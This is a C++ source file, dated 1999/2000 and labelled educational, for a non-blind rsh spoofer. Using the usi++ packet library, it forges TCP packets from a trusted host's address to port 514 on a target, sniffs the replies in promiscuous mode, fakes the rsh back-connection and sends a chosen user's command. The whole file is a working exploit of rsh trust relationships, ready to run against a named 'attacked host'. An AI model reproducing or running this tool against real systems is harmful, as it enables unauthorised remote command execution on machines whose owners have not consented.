/*** Non-blind rsh-spoofer (trust-relationship-exploitation)
 *** (C) 1999/2000 by S. Krahmer <krahmer@cs.uni-potsdam.de>
 *** FOR EDUCATIONAL PURPOSES ONLY.
 *** Tested against linux 2.0.x kernels.
 ***/
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <iostream.h>
#include <usi++/usi++.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>

#define DUMMY ""

// give out some infos about the received packet
int print_info(TCP* r)
{
	cout<<"[flags: ";
	if (r->get_flags() & TH_FIN)
		cout<<"FIN ";
	if (r->get_flags() & TH_SYN)
		cout<<"SYN ";
	if (r->get_flags() & TH_RST)
		cout<<"RST ";
	if (r->get_flags() & TH_PUSH)
		cout<<"PUSH ";
	if (r->get_flags() & TH_ACK)
		cout<<"ACK ";
	if (r->get_flags() & TH_URG)
		cout<<"URG ";
	cout<<"] [ACK: "<<r->get_ack()<<"] [SEQ: "<<r->get_seq()<<"]"<<endl;
	return 0;
}

// a spoofed connect() to the server port 514 will
// cause a connect() from him to a port we chose
// here we simulate a accept(), so we can write
// our command after this accept()
int spoof_accept(char *src_ip, char *dst_ip, int port)
{
   	TCP *send, *rcv;
        char sniffbuf[1000] = {0};
        unsigned long iaddr;
	
	send = new TCP(dst_ip);
	rcv = new TCP(dst_ip);
	
	if ((iaddr = inet_addr(src_ip)) < 0) {
		perror("inet_addr");
		exit(errno);
	}
	cout<<"\nbe patient, spoofing a accept() ...\n\n";
        
	// wait for the SYN from the connect() 
	rcv->set_dstport(0);
	rcv->init_device("eth0");
	while ((rcv->get_dstport() != port) || !(rcv->get_flags() & TH_SYN) || iaddr != rcv->get_dst()) 
		rcv->sniffpack(sniffbuf, 100);
	print_info(rcv);
	
	send->set_srcport(port);
	send->set_src(src_ip);
	send->set_dstport(rcv->get_srcport());
	send->set_flags(TH_ACK|TH_SYN);
	send->set_ack(rcv->get_seq()+1);
	send->sendpack(DUMMY);
        return 0;
}


int main(int argc, char **argv)
{
        char buf[1000] = {0}, sbuf[1000] = {0};
	int port = 0, isn = 0;
	unsigned long iaddr;
	
	if (argc < 4) {
		cout<<"Usage: "<<argv[0]<<" [src_ip] [src_port] [dst_adress] [user]"<<endl
		    <<"		. src_ip      = the trusted host\n"
		    <<"		. src_port    = arbitarty port < 1023, port+1 will be used for accept()!\n"
		    <<"		. dst_adress  = the attacked host\n"
		    <<"		. user	      = some trusted user\n\n";
		return 1;
	}
	port = atoi(argv[2]);
	cout<<"\nUsing sourceport# "<<port<<endl;
	
	// create objects
	TCP *rcv = new TCP((const char*)argv[3]);
	TCP *send = new TCP((const char*)argv[3]);
	
	// switch on promiscous mode for sniffing
	rcv->promisc_on("eth0");
        
	// translate 'our' adress
	if ((iaddr = inet_addr(argv[1])) < 0) {
		perror("inet_addr");
		exit(errno);
	}

	// SYN to server - spoof a connect()
	send->set_srcport(port);
        send->set_dstport(514);
        send->set_src(argv[1]);        
	send->set_flags(TH_SYN);
	send->set_win(512);
	send->sendpack(DUMMY);
	

	// wait for SYN/ACK
    	rcv->set_dstport(0);
	while ((rcv->get_dstport() != port) || !(rcv->get_flags() & TH_SYN) || iaddr != rcv->get_dst()) 
		rcv->sniffpack(buf, 1000);
		
	print_info(rcv);
	
	// ACK the received sequence#+1
	send->set_flags(TH_ACK);
	isn = rcv->get_seq();
	send->set_ack(isn+1);
	send->set_seq(send->get_seq()+1);
	send->sendpack(DUMMY);
	
	// INC our SEQ-#
	send->set_flags(0);
	send->set_seq(send->get_seq());
	
	/* give rsh local port */
	sprintf(sbuf,"%d", port+1);
	send->sendpack(sbuf, strlen(sbuf)+1);
	send->set_seq(send->get_seq() + strlen(sbuf)+1);
		
        spoof_accept(argv[1], argv[3], port+1);

	// and local username
	memset(sbuf, 0, 1000);
	send->set_flags(0);
	sprintf(sbuf, "%s", argv[4]);
	send->sendpack(sbuf, strlen(sbuf)+1);
	send->set_seq(send->get_seq() + strlen(sbuf)+1);
	
	// remote username
	send->sendpack(sbuf, strlen(sbuf)+1);
	send->set_seq(send->get_seq() + strlen(sbuf)+1);
	
	cout<<"Enter command:\n>";
	fgets(buf, 100, stdin);
	
	// and command	
	send->sendpack(buf, strlen(buf)+1);
	
	// wait for answer
	rcv->set_dstport(0);
	memset(sbuf, 0, 1000);
	while ((rcv->get_dstport() != port) || !(rcv->get_flags() & TH_FIN) || iaddr != rcv->get_dst()) {
		rcv->sniffpack(buf, 1000);
		if (rcv->get_dstport() == port)
			cout<<sbuf;
		memset(sbuf, 0, 1000);
	}
	rcv->promisc_off();
	
	// OK, went here, so close the connection
	send->set_seq(send->get_seq()+strlen(buf)+2);
	send->set_flags(TH_ACK);
	send->set_ack(rcv->get_seq()+1);
	send->sendpack(DUMMY);
	send->set_flags(TH_FIN);
	send->set_seq(send->get_seq()+1);
	send->sendpack(DUMMY);
	
	delete rcv;
	delete send;
        return 0;
}
        

